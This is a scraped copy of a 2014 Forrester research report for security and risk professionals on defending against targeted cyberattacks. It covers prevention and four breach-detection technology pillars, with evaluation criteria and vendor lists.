20
Forrester Research, Inc., 60 Acorn Park Drive, Cambridge, MA 02140 USA Tel: +1 617.613.6000 | Fax: +1 617.613.5000 | www.forrester.com Targeted-Attack Hierarchy Of Needs, Part 2 by Rick Holland, July 24, 2014 | Updated: July 25, 2014 For: Security & Risk Professionals KEY TAKEAWAYS Prevention Isn’t Dead ere are innovative prevention technologies, but for these controls to be relevant, they must demonstrate operational effectiveness and scalability. Solutions that are appealing on datasheets must also work for modern enterprise. If done well, prevention can relieve some of the daily operational burden and stress on S&R professionals. No Single Technology Will Meet Your Breach Detection Needs Investing in malware sandboxes alone isn’t sufficient to defend the modern enterprise. You’re going to need a combination of malware analysis, network analysis and visibility, endpoint visibility and control, and security analytics. Invest In Vendors That Provide Multiple Pillars Prioritize the vendors who can supply you with multiple technology pillars. Make sure that these vendors also offer a common user experience, and as many integrations between their technologies as possible. Vendors that can enable the orchestration of your defense should be at the top of your list.

Forrester Targeted-Attack Hierarchy

Embed Size (px)

DESCRIPTION

Targeted attack theory

Citation preview

  • Forrester Research, Inc., 60 Acorn Park Drive, Cambridge, MA 02140 USA

    Tel: +1 617.613.6000 | Fax: +1 617.613.5000 | www.forrester.com

    Targeted-Attack Hierarchy Of Needs, Part 2by Rick Holland, July 24, 2014 | Updated: July 25, 2014

    For: Security & Risk Professionals

    Key TaKeaways

    Prevention Isnt DeadThere are innovative prevention technologies, but for these controls to be relevant, they must demonstrate operational effectiveness and scalability. Solutions that are appealing on datasheets must also work for modern enterprise. If done well, prevention can relieve some of the daily operational burden and stress on S&R professionals.

    No single Technology will Meet your Breach Detection NeedsInvesting in malware sandboxes alone isnt sufficient to defend the modern enterprise. Youre going to need a combination of malware analysis, network analysis and visibility, endpoint visibility and control, and security analytics.

    Invest In Vendors That Provide Multiple PillarsPrioritize the vendors who can supply you with multiple technology pillars. Make sure that these vendors also offer a common user experience, and as many integrations between their technologies as possible. Vendors that can enable the orchestration of your defense should be at the top of your list.

  • 2014, Forrester Research, Inc. All rights reserved. Unauthorized reproduction is strictly prohibited. Information is based on best available resources. Opinions reflect judgment at the time and are subject to change. Forrester, Technographics, Forrester Wave, RoleView, TechRadar, and Total Economic Impact are trademarks of Forrester Research, Inc. All other trademarks are the property of their respective companies. To purchase reprints of this document, please email [email protected]. For additional information, go to www.forrester.com.

    For Security & riSk ProFeSSionalS

    why ReaD ThIs RePoRT

    In part 1 of our research series, we detailed the foundational requirements for building the necessary resiliency to targeted cyberattacks. With the foundational requirements in place, security and risk (S&R) leaders are ready to turn their focus to the technologies for prevention as well as detection and response. S&R leaders frequently struggle with deploying the right mix of technologies to detect and respond to attacks. In this report, we discuss the four technologies that should form the pillars of your breach detection capabilities: malware analysis, network analysis and visibility, endpoint visibility and control, and security analytics. For each technology, we provide you with key evaluation criteria, considerations, and both commercial and open source solutions to help you select the right solution. These technologies, in the hands of skilled staff, are essential for building resiliency into your cybersecurity program.

    table of contents

    Forresters Targeted-attack hierarchy of Needs Continues

    need no. 5: Prevention

    need no. 6: Detection and response

    you Must Build each Tech Pillar of The Breach Detection stack

    Pillar no. 1: Malware analysis

    Pillar no. 2: network analysis and Visibility

    Pillar no. 3: endpoint Visibility and control

    Pillar no. 4: Security analytics

    Balance The Pillars Based on your Needs

    WHat it MeanS

    Detection and Response Require an Integrated Technology stack

    supplemental Material

    notes & resources

    Forrester used a combination of primary and secondary research in the writing of this report.

    related research Documents

    Prepare For the Post-aV era Part 1: Five alternatives to endpoint antivirusJune 9, 2014

    introducing Forresters targeted-attack Hierarchy of needs, Part 1 of 2May 15, 2014

    Five Steps to Build an effective threat intelligence capabilityJanuary 15, 2013

    Targeted-attack hierarchy of Needs, Part 2Multiple technologies are required For Breach Detectionby rick Hollandwith Stephanie Balaouras, katherine Williamson, and andrew Hewitt

    2

    4

    16

    14

    16

    July 24, 2014 uPDateD: July 25, 2014

  • For Security & riSk ProFeSSionalS

    targeted-attack Hierarchy of needs, Part 2 2

    2014, Forrester Research, Inc. Reproduction Prohibited July 24, 2014 | Updated: July 25, 2014

    FoRResTeRs TaRgeTeD-aTTaCK hIeRaRChy oF NeeDs CoNTINues

    Its imperative that S&R leaders have a thoughtful and deliberate plan to fend off targeted cyberattacks. In part 1 of our research series, we focused on the fundamental requirements that S&R leaders must build into their security strategy: need no. 1: an actual security strategy; need no. 2: a dedication to recruiting and retaining staff; need no. 3: a focus on the fundamentals; and need no. 4: an integrated portfolio that enables orchestration (see Figure 1). Without fulfilling these fundamental needs, security organizations will struggle with even pedestrian adversaries and certainly fail against more skilled adversaries. In this part 2 of our series, we discuss need no. 5: prevention, as well as the technologies associated with need no. 6: detection and response.

    Figure 1 The Targeted-Attack Hierarchy Of Needs

    Source: Forrester Research, Inc.116182

    An integrated portfolio thatenables orchestration

    A focus on the fundamentals

    A dedication to recruiting and retaining staff

    An actual security strategy

    Prevention

    Detectionand

    response

    Need No. 5: Prevention

    Prevention is dead, long live prevention. One of the recent trends in information security is to claim that prevention is dead. You should be particularly suspicious of vendors that only deal in detection that make this claim. Investment will shift to detection, but prevention isnt going away, and the reports of its death have been greatly exaggerated. When thinking about prevention, remember:

  • For Security & riSk ProFeSSionalS

    targeted-attack Hierarchy of needs, Part 2 3

    2014, Forrester Research, Inc. Reproduction Prohibited July 24, 2014 | Updated: July 25, 2014

    The Pareto principle applies. Not all attacks are targeted, and not all targeted attacks are from state actors or other sophisticated cyberadversaries. If you can use prevention to eliminate 80% of the attacks against your organization, you can focus your limited resources on detecting and responding to the attackers that have the motivation and capability to do the greatest harm. You dont want to be focusing on nuisance threats while skilled attackers are exfiltrating your most precious data.1 At a minimum, prevention eliminates noise.

    Prevention can be innovative. Prevention can do more than just eliminate noise. Dont think of prevention as just antivirus (AV) blacklisting and IDS/IPS signatures; prevention can be much more than that. During the past 18 months, we have seen the emergence of innovative solutions at the endpoint, including: Bromium, Invincea, and IBM Trusteer.2 RSA Conference Innovation Sandbox finalist, Cylance, as well as Cyvera (recently acquired by Palo Alto Networks) are other examples of innovative endpoint security controls.3 The Microsoft Enhanced Mitigation Experience Toolkit also provides this type of capability. Its important to note that even solutions that are designed to prevent zero day attacks can be circumvented. In early July, researchers from Offensive Security were able to disable all of EMETs protection.4 If you can prevent something malicious from occurring in the first place, there is no need for response.

    Prevention must not negatively affect the user experience. You can have the most effective security control, but if it is so intrusive that employees cant work, it wont be in production for very long.5 This applies to endpoint security as well; the poor user experience from training host intrusion prevention system (HIPS) is a prime example. These new endpoint solutions must demonstrate that they can be effective and transparent to users.6 Many organizations, concerned about blocking legitimate actions, have adopted a lighter touch on the endpoint via endpoint visibility and control (EVC) solutions.

    Prevention must demonstrate operational effectiveness and scalability. The user experience isnt the only perspective that S&R pros need to consider; the administrators experience operationalizing the solution is also important. Dashboards and an intuitive user interface enhance operational effectiveness. Scalability is another important consideration: Deploying a solution to 100 endpoints is one thing, deploying a solution to 100,000 endpoints is an entirely different matter. Tanium, a solution with endpoint visibility capabilities, just received $90 million in funding in part because of its ability to deploy at scale for very large enterprises.7

    Prevention will always be a part of response. At a certain stage in detection, you will move to response. Blocking adversary command and control is one example of prevention. Prevention also occurs in the containment phase of response. From a network perspective, you might use network access control to kill the switch port connected to the infected host. You might use endpoint visibility and control to surgically kill a malicious process. You could also integrate with Active Directory to prevent a compromised account from accessing the network. The real questions regarding prevention are how will you integrate it into your portfolio and how can you use it as a force multiplier for your protection.

  • For Security & riSk ProFeSSionalS

    targeted-attack Hierarchy of needs, Part 2 4

    2014, Forrester Research, Inc. Reproduction Prohibited July 24, 2014 | Updated: July 25, 2014

    Need No. 6: Detection and Response

    Although prevention isnt dead, it can fail. Do you think a sophisticated adversary like the NSA or any other nation-state actor is going to cease targeting you once they discover you have the latest and greatest preventive controls? Absolutely not: A determined and well-resourced adversary will find a way to render these controls ineffective. Given the immaturity of most organizations, attackers dont even have to be that clever to accomplish their goals. Hope for prevention; plan on detection and response. When prevention fails, detection and response are your only options. Having capable incident response is critical. Forrester identified seven habits that effective incident response teams must possess.8 IR programs that adopt these principles will be better prepared to adapt to the threat landscape and will be able to recover from security incidents more effectively. From a technology perspective, there are four primary functions, or pillars, that are necessary for breach detection: 1) malware analysis; 2) network analysis and visibility (NAV); 3) endpoint visibility and control (EVC); and 4) security analytics (SA).

    Threat intelligence will play an important role in detection and response.9 Vendors have bandied about and overused the term actionable threat intelligence so much that it has become a buzzword without meaning. This is unfortunate because its possible to turn multiple sources of intelligence into action, but it requires dedicated staff committed to following a continuous cycle of collecting, analyzing, and then disseminating intelligence. Forrester defines actionable intelligence as being accurate, aligned with intelligence requirements, integrated, predictive, relevant, tailored, and timely.10 You should leverage actionable threat intelligence within your technology stack to help you: 1) identify potential threats on the horizon targeting your industry or specific organization; 2) prioritize the remediation of vulnerabilities and architectural adjustments in your environment; and 3) help to identify the attacks that are already in progress. Its indispensable to both prevention and breach detection and response.

    you MusT BuIlD eaCh TeCh PIllaR oF The BReaCh DeTeCTIoN sTaCK

    There is no single technology that will detect the intrusions and breaches within your organization; you need solutions that will help you build all four pillars of your breach detection stack (see Figure 2). You need to instrument your entire security organization for breach detection. This includes the people, process, and oversight required to make technology deployments successful.

  • For Security & riSk ProFeSSionalS

    targeted-attack Hierarchy of needs, Part 2 5

    2014, Forrester Research, Inc. Reproduction Prohibited July 24, 2014 | Updated: July 25, 2014

    Figure 2 Technology Pillars Of Breach Detection

    Source: Forrester Research, Inc.116182

    Malware analysis

    Endpoint visibilityand control

    Network analysis andvisibility

    Security analytics

    Threatintelligence

    Pillars of detection

    Pillar No. 1: Malware analysis

    FireEye leveraged automated malware analysis to address threats that the traditional security vendors were failing to stop. FireEye took automated malware analysis mainstream; today, almost all security vendors have some sort of automated malware analysis capability. Malware analysis is frequently an organizations first foray into attempting to address the threat landscape. Generally speaking, malware analysis consists of dynamic and static analysis:

    Dynamic analysis executes and observes malware. Virtual sandboxes are a popular method for performing dynamic analysis. Advanced dynamic analysis introduces a debugger to observe the internal state of an executable. These automated malware analysis solutions inspect code and make a determination as to whether it is malicious in nature.

    Dynamic malware analysis can be effective at detecting malicious code; however, adversaries are well aware of this technology within their targets. This has led to a constant cat-and-mouse game in which adversaries try to evade analysis and vendors try to enhance their solutions with anti-evasion techniques. FireEye has written several blog postings illustrating the evolution of sandbox evasion. Most recently, they wrote about evasion techniques that require human interaction.11 Anti-evasion techniques are just some of the criteria that you need to consider when evaluating automated malware analysis capabilities (see Figure 3).

  • For Security & riSk ProFeSSionalS

    targeted-attack Hierarchy of needs, Part 2 6

    2014, Forrester Research, Inc. Reproduction Prohibited July 24, 2014 | Updated: July 25, 2014

    Static analysis analyzes the code or structure of malware to understand how it functions. Unlike dynamic analysis, static analysis does not run the malware itself at the time of analysis. Malware authors make static analysis more difficult by obfuscating the execution of malware and by using packers to compress executables. More advanced static analysis involves reverse engineering the malware. Malware analysis solutions often include some very light static analysis to help detect malcode that might not execute in a virtual environment.

  • For Security & riSk ProFeSSionalS

    targeted-attack Hierarchy of needs, Part 2 7

    2014, Forrester Research, Inc. Reproduction Prohibited July 24, 2014 | Updated: July 25, 2014

    Figure 3 Automated Malware Analysis Considerations, Key Evaluation Criteria, And Solutions

    Source: Forrester Research, Inc.116182

    Automated malware analysis

    Considerations A combination of dynamic and static analysis can detect malware that traditionalsignature-based controls miss.

    Sophisticated adversaries will circumvent dynamic malware analysis. Evasion detectionis important.

    Many organizations are overwhelmed by malware alerts. Alert-driven security is areality.

    Scalability is a challenge for on-premises malware analysis deployments when anorganization is distributed with many ingress/egress points.

    Malware analysis solution must observe malicious code; it isnt effective against threatvectors where initial infection occurs in extended enterprise beyond perimeter securitycontrols (watering hole attacks/SWC).

    Malware analysis solution is unable to observe lateral movement where malicious codeisnt involved.

    For many vendors, malware analysis visibility is limited to web, email, and SMBprotocols.

    Organizations with operational security (OPSEC) concerns should consideron-premises or private cloud deployments. The analysis of malware that results insubsequent blocking could alert attackers.

    Key evaluationcriteria

    Deployment options: on-premises, cloud, hybrid.

    On-premises deployment options: passive, passive blocking, inline blocking.

    What malware analysis techniques are used (static, dynamic, emulation, networkbehavior)?

    What types of content is inspected (executables, DLLs, archives, images, PDFs, Flash,ofce documents, JavaScript)?

    What anti-evasion techniques are used to ensure malware executes in the analysisenvironment?

    What endpoint integrations exist? Integration with endpoint controls provides endpointcontext. Was the endpoint already patched for the vulnerability being exploited?Endpoints can also perform containment/remediation.

    Ability to perform dynamic analysis on customized virtual machine images.

    Virtual machine operating system support (Windows, OSX).

    Visibility into encrypted trafc.

    Android APK analysis.

    Ability to consume and export third-party threat intelligence (IODEF, OpenIOC,STIX/CybOX).

    What NAV capabilities exist? Some of the vendor solutions not only offer automatedmalware analysis, but also offer NAV capabilities.

  • For Security & riSk ProFeSSionalS

    targeted-attack Hierarchy of needs, Part 2 8

    2014, Forrester Research, Inc. Reproduction Prohibited July 24, 2014 | Updated: July 25, 2014

    Figure 3 Automated Malware Analysis Considerations, Key Evaluation Criteria, And Solutions (Cont.)

    Source: Forrester Research, Inc.116182

    Solutions:

    Commercial Bluecoat Norman Sandbox, Cyphort, Fidelis XPS Advanced Threat Defense, FireEye Threat Prevention Platform, Light Cyber, Palo Alto Networks WildFire, Lastline, Seculert, ThreatGrid, Trend Micro Deep Discovery

    Open source Anubis, Cuckoo Sandbox, Minibis, Wepawet

    Pillar No. 2: Network analysis and Visibility

    One of the key components of a Zero Trust network is network analysis and visibility (NAV).12 NAV is a diverse set of tools designed to provide network-based situational awareness to S&R pros. NAV tools perform many functions including: malicious behavior detection, network discovery, flow analysis, meta-packet capture, full packet capture, and network forensics.13

    The convergence of some NAV and security information management/security information and event management (SIM/SIEM) capabilities is under way.14 LogRhythm is one of many SIM/SIEM solutions that can consume a number of flow formats. RSA has combined the network forensics capabilities of NetWitness with the SIM capabilities of enVision into its RSA Security Analytics solution. SIM/SIEM integration is just one of the criteria when considering NAV solutions (see Figure 4).

  • For Security & riSk ProFeSSionalS

    targeted-attack Hierarchy of needs, Part 2 9

    2014, Forrester Research, Inc. Reproduction Prohibited July 24, 2014 | Updated: July 25, 2014

    Figure 4 NAV Considerations, Key Evaluation Criteria, And Solutions

    Source: Forrester Research, Inc.116182

    Network analysis and visibility

    Considerations Layer 7 visibility at the Internet perimeter(s) should be one of your first priorities. Similarvisibility at data center ingress/egress should follow.

    Packet capture at the Internet perimeter(s) is ideal. Similar capability at data centeringress/egress should follow. Packet capture fidelity is important; you cannot afford todrop or miss packets.

    Flow data is probably already being used by infrastructure and operations (I&O);leverage it for security purposes. Flow data can be used for detection of attacker lateralmovement; it is more scalable than packet capture for this use case.

    NGFW/segmentation gateways provide NAV capabilities (detection of port hopping,SSH/SSL use, and use of nonstandard port).

    The more segmented the network, the more challenging NAV implementations become.Instrumenting enterprise networks for NAV takes time.

    Do you trust the endpoint? NAV can validate what data the endpoint is reporting(situations where endpoint is compromised with a rootkit).

    NAV lacks the rich host context that endpoint analysis and control solutions provide.

    Key evaluationcriteria

    What are the deployment options (i.e., physical/virtual, distributed)?

    How much throughput can capturing devices handle (1Gbps, 10Gps, 40Gbps)?

    What are the storage capabilities of the solution (direct attached capacity/storagearea network capabilities)?

    How is indexing performed (metadata creation, PCAP association)?

    What visualization capabilities exist to enhance analysis?

    What behavioral analysis capabilities exist (malware command and control, dataexfiltration)?

    What encrypted traffic inspection capabilities exist?

    What incident response/forensic analysis workflows exist?

    How is searching performed? How long do searches take?

    How does solution ingest threat intelligence? Ability to consume and export third-partythreat intelligence (IODEF, OpenIOC, STIX/CybOX). How can you hunt/search for threatindicators?

    What applications are classified?

    What endpoint integrations exist?

    How is asset/individual risk used for triage (high-value targets like domain controllers,C-suite staff)?

  • For Security & riSk ProFeSSionalS

    targeted-attack Hierarchy of needs, Part 2 10

    2014, Forrester Research, Inc. Reproduction Prohibited July 24, 2014 | Updated: July 25, 2014

    Figure 4 NAV Considerations, Key Evaluation Criteria, And Solutions (Cont.)

    Source: Forrester Research, Inc.116182

    Solutions:

    Commercial Arbor Networks Pravail Security Analytics, Blue Coat Security Analytics (Solera Networks), Damballa Failsafe, FireEye nPulse, Lancope StealthWatch, LightCyber Detect, Novetta Cyber Analytics, RSA Security Analytics (Netwitness/enVision)

    Open source Argus, Bro, Security Onion, Snorby, Snort OpenAppID, System for Internet-LevelKnowledge (SiLK)

    Pillar No. 3: endpoint Visibility and Control

    Endpoint visibility and control (EVC) seeks to provide detailed visibility into activity occurring on the endpoint. EVC solutions can provide details on endpoint process executions, application/file/registry modifications, network activity, active memory, as well as kernel-driver activity. Some EVC solutions provide visibility only, while others also provide the ability to contain malicious endpoint behavior.15

    There are endpoint offerings like Palo Alto Networks Next-Generation Endpoint Protection, intended to prevent malicious activity from occurring in the first place. This is ideal, but working under the assumption that determined adversaries will find a way to circumvent your controls, visibility is also important. In 2012, Bit9 was targeted so that the adversary could breach a Bit9 customer. The attackers couldnt circumvent Bit9s whitelisting protection directly, so they compromised Bit9 to digitally signing their malware to make it appear to be legitimate software.16 A deeper level of visibility on the hosts running this signed malware could have provided the company with valuable insight that might have accelerated the detection of malicious activity. Deep visibility is just one evaluation criteria to use when considering EVC solutions (see Figure 5).

  • For Security & riSk ProFeSSionalS

    targeted-attack Hierarchy of needs, Part 2 11

    2014, Forrester Research, Inc. Reproduction Prohibited July 24, 2014 | Updated: July 25, 2014

    Figure 5 Endpoint Visibility And Control Considerations, Key Evaluation Criteria, And Solutions

    Source: Forrester Research, Inc.116182

    Endpoint analysis and control

    Considerations The extended enterprise makes endpoint security a necessity. Organizations have novisibility when endpoints are beyond the perimeter. For example, an endpointperspective is needed to detect strategic web compromise/water hole attacks whenthe host is remote.

    Endpoint perspective is necessary to determine the impact of malware. Did it actuallyexecute? Was the host already patched against the exploit?

    Endpoint control provides the ability to perform surgical containment of maliciousprocesses.

    Endpoint solutions must demonstrate that they can deploy at scale in an operationallyeffective manner.

    BYOC makes deployment challenging if not impossible.

    Need to overcome yet-another-agent syndrome. The addition of a new endpoint agentcan impact the resources available on a host already having multiple endpoint agents.

    If the endpoint is already compromised, you cannot trust what it is reporting back.EVC must be deployed to a host in a known good state.

    Key evaluationcriteria

    Does the solution operate in user space or kernel space?

    What impact does EVC agent have on the host operating system (memory, CPU, disk)?

    Does the solution provide visibility and monitoring only? What about containment?

    What operating systems are supported (Windows, OSX)?

    What workflow is used for enabling automated response (crawl, walk, run)?

    What threat intelligence standards are supported (OpenIOC, STIX/TAXII/CybOX)?

    What visualization capabilities exist to enhance analysis?

    What incident response/forensic analysis workflows exist?

    What network security/NAV integrations exist?

    How does solution ingest threat intelligence? How can you hunt/search for threatindicators?

    What lateral movement detections exist? How does the solution detect privilege escalation or the use of legitimate Windows tools for malicious purposes?

    What integrations exist for automated response (Active Directory integrations foraccount lockout, switch port integrations for disabling endpoint network access)?

    How is asset/individual risk used for triage (high-value targets like domain controllers,C-suite staff)?

    Solutions:

    Open source

    Commercial Bit9, Carbon Black, Confer, CounterTack Sentinel, CrowdStrike Falcon Host, Cybereason, FireEye HX, Guidance Software Cyber Security, Hexis HawkEye G, Tanium, Triumfant, Verdasys Digital Guardian

    Immunity El Jefe, OSSEC

  • For Security & riSk ProFeSSionalS

    targeted-attack Hierarchy of needs, Part 2 12

    2014, Forrester Research, Inc. Reproduction Prohibited July 24, 2014 | Updated: July 25, 2014

    Pillar No. 4: security analytics

    Few will argue that the traditional approach to SIM/SIEM is effective. Many claim to have intelligence-led security but actually have alert-driven security. To be at all useful, SIM/SIEM solutions require skilled analysts to operate and maintain them the kind of staff few organizations have. In addition, clients regularly complain that the lack of any kind of meaningful context around alerts makes triage even more difficult.17 As a result:

    Vendors are developing new security analytics (SA) solutions . . . The convergence of the correlating and reporting functions of SIM/SIEM, together with information feeds from data leak protection solutions, NAV solutions, identity and access management solutions, and even fraud solutions, will give S&R pros the kind of context and situational awareness they need for action. The challenge is that out-of-the-box SA solutions dont exist just yet. Vendors of legacy SIM/SEIM solutions are expanding the collection and analysis of new types of business and IT data to improve their ability to offer information in context, but many organizations are developing homegrown solutions using big data solutions like Hadoop. Still other vendors are hoping to disrupt the market with deep insights into particular domains like the endpoint. Both Guidance Software and CrowdStrike have analytics capabilities on the endpoint.18

    . . . that can also automate remediation. Not only must SA provide you with actionable data, it must have integrations and automation to help you take action. SA should help us avoid obstacles, and see the road ahead. Proofpoints recent acquisition of incident response and orchestration specialist NetCitadel is evidence that demand for SA solutions with automated response is heating up.19 Automation is just one criterion to consider when evaluating SA solutions (see Figure 6).

  • For Security & riSk ProFeSSionalS

    targeted-attack Hierarchy of needs, Part 2 13

    2014, Forrester Research, Inc. Reproduction Prohibited July 24, 2014 | Updated: July 25, 2014

    Figure 6 Security Analytics Considerations, Key Evaluation Criteria, And Solutions

    Source: Forrester Research, Inc.116182

    Security analytics

    Considerations The SA vendors that can offer a platform that enables the orchestration of detectionand response through integrations and automation will be an organizations mostvaluable partner.

    Early adopters of the big data solutions like Hadoop have had to develop their ownsecurity analytics capabilities, but this is starting to change as vendors bringprepackaged analytics online. There are still no turnkey offerings.

    Technology is core to SA, but just as with SIM/SIEM, people and process ultimatelydetermine success. Like anything else, dont think of SA as a silver bullet.

    How much effort is required for you to implement and operationalize SA? If you donthave the resources, not unlike SIM/SIEM, MSSPs may be a more practical alternativefor SA.

    As SA platforms consume more and more data to provide richer context, you mustmake securing this data a priority. All your eggs are in one basket; you areconcentrating your liability and you must protect the data.

    Infrastructure is moving to the cloud; if you thought doing SA on-premises waschallenging, the cloud will only complicate this more. Companies like Threat Stack andAlert Logic provide analytics into elastic infrastructure.

    The disillusionment with SIM/SIEM has led to the emergence of SA capabilities withinindividual security controls. Crowdstrike released Endpoint Activity Monitoring, whichembeds Splunk software as a machine data platform for the search, alerting, reporting,and analytics capabilities.

    Key evaluationcriteria

    What type of data can the SA solution consume (structured data, unstructured data,application data, log data, flow data, meta packet capture, full packet capture, eventdata, vulnerability data, identity data, third-party intelligence, data from elasticinfrastructure)?

    How does the solution ingest threat intelligence (JSON, CSV, XML)? What threatintelligence standards are supported (IODEF, OpenIOC, STIX/TAXII/CybOX)?

    What analytic capabilities does the SA solution possess (statistical modeling,predictive analytics, behavioral modeling)?

    What internal context is used to prioritize alerting? How are asset value, vulnerabilitiespresent, attack path modeling, and identity incorporated into alert triage?

    What external context is used to prioritize alerting? How are threat intelligence andreal-world exploitation of vulnerabilities incorporated into alert triage?

    What incident response/forensic analysis workflows exist? How can you hunt/searchfor threat indicators?

    What lateral movement detections exist? How does the solution detect privilege escalation or the use of legitimate Windows tools for malicious purposes?

    What analyst enrichments exist in the solution (GeoIP, passive DNS, asset value,Whois lookups)?

  • For Security & riSk ProFeSSionalS

    targeted-attack Hierarchy of needs, Part 2 14

    2014, Forrester Research, Inc. Reproduction Prohibited July 24, 2014 | Updated: July 25, 2014

    Figure 6 Security Analytics Considerations, Key Evaluation Criteria, And Solutions (Cont.)

    Source: Forrester Research, Inc.116182

    Security analytics

    Key evaluationcriteria

    What visualization capabilities exist to enhance analysis (similar to the user experienceof Paterva Maltego or Tableau Software)? Does graph analysis exist?

    What pivoting capabilities exist? Can analyst pivot and drill down into new data whilepreserving previous searches/queries?

    Does the SA reporting include templates for time-to-detection?

    What integrations facilitate action? What detective and preventive security controlintegrations exist? What APIs exist for custom integrations?

    Solutions:

    Commercial Alert Logic, BAE Applied Intelligence Cyber Reveal, Cloudera, FireEye Threat AnalyticsPlatform, IBM i2 Analysts Notebook, Palantir, Splunk, Sumo Logic, traditional SIM/SIEMlike LogRhythm, IBM Qradar, McAfee, HP ArcSight

    Open source Apache Hadoop, OSSIM

    BalaNCe The PIllaRs BaseD oN youR NeeDs

    One of the most common questions clients ask Forrester is Where do we start? Chances are you dont have very many of the necessary technology components of each pillar deployed in your environment. To help you decide how to start, ask and answer the following questions:

    Do we benefit from prioritizing network or endpoint controls first? Although NAV solutions can provide visibility into key networks, network security controls such as these arent sufficient. You also need visibility into the endpoint. There are benefits and limitations to each, and while you need both perspectives, you may not have the budget and the staff to do both, so youll have to prioritize (see Figure 7). For most organizations, network controls provide quick wins that greatly improve visibility.

    Do we have sufficient protections on the endpoint? You can leverage network controls to gain quick wins, but that doesnt mean you must delay implementing new endpoint controls based on use cases. Forrester recommends starting off by deploying preventive-based controls to high-value targets like domain controllers and other critical assets. Next apply EVC to laptops that move in and out of your environment. A company like Bit9 can cover each use case with its traditional preventive whitelisting offering combined with the visibility of its Carbon Black acquisition.20 You can consider companywide EVC deployments to give you maximum visibility, but the expense and operational costs of this is probably not the best use of your limited resources, unless you already have capabilities in the other pillars.

  • For Security & riSk ProFeSSionalS

    targeted-attack Hierarchy of needs, Part 2 15

    2014, Forrester Research, Inc. Reproduction Prohibited July 24, 2014 | Updated: July 25, 2014

    How do we best plot the transitioning from SIM/SIEM to SA? The migration from SIM/SEIM to SA is going to take time. SA is in its infancy; there are no turnkey solutions out there. To build a solid foundation for your SA migration, focus on staff. You must have data analytics capabilities. It would also be helpful to start your analytics projects on structured data first. Rushing to do analytics on unstructured data without first having effective people, process, and technology will be challenging. As we stated above, analytics capabilities are also developing within individual security controls, so take advantage of this. Work with your current vendors and find out how theyre building upon their analytic capabilities and then take advantage of them.

    How much are we to spend on malware analysis? Malware analysis plays a role in the detection of attacks, but against sophisticated adversaries, it has diminishing returns. So how should you prioritize your investment? Depending on your threat model, deploying NAV capabilities at Internet ingress/egress first could offer better returns on your security investment. Malware analysis that is embedded as a feature in a broader offering allows you to acquire multiple pillars at once, potentially saving money for investment in another pillar.

    Figure 7 You Must Balance Endpoint And Network Security Controls

    Source: Forrester Research, Inc.116182

    Endpoint approach Network approach

    No visibility when endpoints areoutside the perimeter (unlessSaaS is used)

    Challenges determining theimpact on the endpoint

    Out-of-band deployments offerquick, transparent way to getvisibility

    Avoid challenges associatedwith endpoint securitydeployments

    Scalability challenges fordistributed enterprises; directto Net exacerbates this

    Visibility beyond the perimeter;follows endpoints in extendedenterprise

    Expedites response; able todetermine if a host has beencompromised

    Endpoint visibility can improvemean time-to-detection;endpoint prevention can stopexecution of malicious activitybehavior

    Something else on theendpoint; has the traditionalendpoint security challenge

    Consumerization BYOD/BYOCdeployment challenges

  • For Security & riSk ProFeSSionalS

    targeted-attack Hierarchy of needs, Part 2 16

    2014, Forrester Research, Inc. Reproduction Prohibited July 24, 2014 | Updated: July 25, 2014

    W h at i t m e a n s

    DeTeCTIoN aND ResPoNse RequIRe aN INTegRaTeD TeChNology sTaCK

    Its important that you develop a road map for building out each of the technology pillars. You must remember that creating an integrated portfolio that enables orchestration should be a core tenet of your architectural, process, and product/service decisions.21 When evaluating technology, prioritize vendors that offer multiple pillars as well as those that have third-party integrations that make operationalizing the solution effective. You dont necessarily need a single pane of glass but you should have a common user experience. This will help you avoid amassing point products that add more overhead than security control. Without an integrated technology stack, you will never be able to improve time-to-detection, containment, and remediation.

    suPPleMeNTal MaTeRIal

    Methodology

    Forresters Forrsights Security Survey, Q2 2013, was fielded to 2,134 IT executives and technology decision-makers located in Canada, France, Germany, the UK, and the US from SMB and enterprise companies with two or more employees. This survey is part of Forresters Forrsights for Business Technology and was fielded from March 2013 to June 2013. ResearchNow fielded this survey online on behalf of Forrester. Survey respondent incentives include points redeemable for gift certificates. We have provided exact sample sizes in this report on a question-by-question basis.

    Forresters Business Technographics provides demand-side insight into the priorities, investments, and customer journeys of business and technology decision-makers and the workforce across the globe. Forrester collects data insights from qualified respondents in 10 countries spanning the Americas, Europe, and Asia. Business Technographics uses only superior data sources and advanced data-cleaning techniques to ensure the highest data quality.

    eNDNoTes1 Source: Business Dictionary.com (http://www.businessdictionary.com/definition/Pareto-principle.html).

    The Pareto principle states that for many events, roughly 80% of the effects come from 20% of the causes.

    2 We have covered alternatives to antivirus in-depth in a previous report. See the June 9, 2014, Prepare For The Post-AV Era Part 1: Five Alternatives To Endpoint Antivirus report.

    3 We have covered the acquisition of Cyvera in-depth in a previous report. See the March 25, 2014, Quick Take: Palo Alto Networks Acquires Cyvera report.

    4 Source: Exploit switches off Microsoft EMETs protection features, Help Net Security (http://www.net-security.org/secworld.php?id=17080).

  • For Security & riSk ProFeSSionalS

    targeted-attack Hierarchy of needs, Part 2 17

    2014, Forrester Research, Inc. Reproduction Prohibited July 24, 2014 | Updated: July 25, 2014

    For further explanation of this concept, please read the recent Offensive Security article post, Disarming Enhanced Mitigation Experience Toolkit (EMET). Source: Offensive Security (http://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet/)

    5 This is one of the primary reasons that many intrusion prevention systems (IPS) are deployed as intrusion detection system (IDS.) No one wants to block valid applications from being used.

    6 Security leaders must realize that human factors contribute to the success of a security control as much as the risk reduction of the security control itself. Security leaders who choose to ignore human factors run the risk of user security mistakes and even a full security breach. There are three human factors that contribute to the success of a security control and six human factors that act as resistors to effectiveness. For more information, see the May 28, 2014, Raise The Security Bar With Human-Factor-Friendly Design Concepts report.

    7 Source: Kyle Russell, A16z Invests $90 Million In Tanium, An Enterprise Systems Management Startup, TechCrunch, June 22, 2014 (http://techcrunch.com/2014/06/22/a16z-invests-90-million-in-tanium-an-enterprise-systems-management-startup/).

    8 Habit No. 1: Are self-aware; Habit No. 2: Understand technology benefits and limitations; Habit No. 3: Establish realistic reporting and metrics; Habit No. 4: Are scalable; Habit No. 5: Collaborate internally and externally; Habit No. 6: Actively engage executives; and Habit No. 7: Operate with autonomy. See the April 17, 2013, Seven Habits Of Highly Effective Incident Response Teams report.

    9 We have previously covered the role of threat intelligence in-depth in a previous report. See the January 15, 2013, Five Steps To Build An Effective Threat Intelligence Capability report.

    10 For more information on how to act on this actionable intelligence, please see the January 15, 2013, Five Steps To Build An Effective Threat Intelligence Capability report.

